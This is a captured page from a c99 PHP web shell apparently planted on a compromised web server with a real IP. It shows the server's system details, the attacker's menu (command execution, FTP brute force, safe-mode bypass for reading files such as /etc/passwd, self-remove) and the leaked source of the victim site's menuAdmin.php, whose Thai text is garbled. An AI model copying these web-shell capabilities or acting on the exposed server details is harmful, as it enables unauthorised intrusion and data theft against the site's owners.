110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/source/ drwxr-xr-x Free 52.6 GB of 127.8 GB (41.15%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/source/ drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.15%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: menuAdmin.php (1.89 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?
include_once("../../um/clsConnection.php");
include_once("../../um/clsUmMenu.php");
include_once("../../um/clsUmPermission.php");
include_once("../../um/clsUmGPermission.php");
include_once("../../um/clsUmUserGroup.php");
$oC = new clsConnection();
$oG = new umusergroup($oC->c);
$oMmn  = new ummenu($oC->c);
$oUp = new umpermission($oC->c);
$oGp = new umgpermission($oC->c);
?>
<script language="JavaScript1.2">
var tmenuItems = [
	["&nbsp;&nbsp;К¶Т№РјЩй»ЇФєСµФ§Т№","index.php","../picture/titleLogin.gif","","", "К¶Т№РјЩй»ЇФєСµФ§Т№",,"0"],
	["|<?=$oU->userLogin?>","","../picture/ico9.gif","","","ЄЧиНјЩй»ЇФєСµФ§Т№","_self"],	["|<?=$oU->userIP?>","","../picture/ico10.gif","","","К¶Т№РјЩй»ЇФєСµФ§Т№","_self"],
	["|<?=$dd?>","","../picture/ico11.gif","","","ЗС№·Хи»ЇФєСµФ§Т№","_self"],
//["&nbsp;&nbsp;аБ№ЩЎТГгЄй§Т№","index.php","../picture/titleMain.gif","","", "аБ№ЩЎТГгЄй§Т№",,"0"],
<?php
// for ecah group app//////////////////////////////////////////
$oG->RSgroupByUs($oU->userID);
while ($oG->GetRecord()){
	$StrMenu = "[\"&nbsp;&nbsp;$oG->UgGpID\",\"index.php\",\"../picture/titleMain.gif\",\"\",\"\", \"аБ№ЩЎТГгЄй§Т№\",,\"0\"],";
	$oU->GpID=$oG->UgGpID;
	$oMmn->RSMainMenuBySt($oU->StID);
	while ($oMmn->GetRecord()){
		$flg=1;
		$oUp->SearchByKey($oU->userID, $oMmn->MnID);
		if ($oUp->GetRecord()){
			$flg = $oUp->pmX;
		}else{
			$oGp->SearchByKey($oU->GpID, $oMmn->MnID);
			if ($oGp->GetRecord()){
				$flg = $oGp->gpX;
			}		
		}
		if ($flg==1){
		//if(true){
			$StrMenu .= "[\"|";
			$StrMenu .=  "$oMmn->MnNameT\",";
			$StrMenu .=  "\"$oMmn->MnURL\",";
			$StrMenu .=  "\"../picture/ico6.gif\",";
			$StrMenu .=  "\"\",";
			$StrMenu .=  "\"\",";
			$StrMenu .=  "\"$oMmn->MnDesc\",";
			$StrMenu .= "\"_self\"],\n";
		}
	}
	$StrMenu = substr($StrMenu,0,strlen($StrMenu)-1);
	$StrMenu .= "];\n";
}
	$oMmn->Close();
	$oGp->Close();
	$oUp->Close();
	echo $StrMenu;
echo "\n";
echo "apy_tmenuInit();";
?>
</script>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--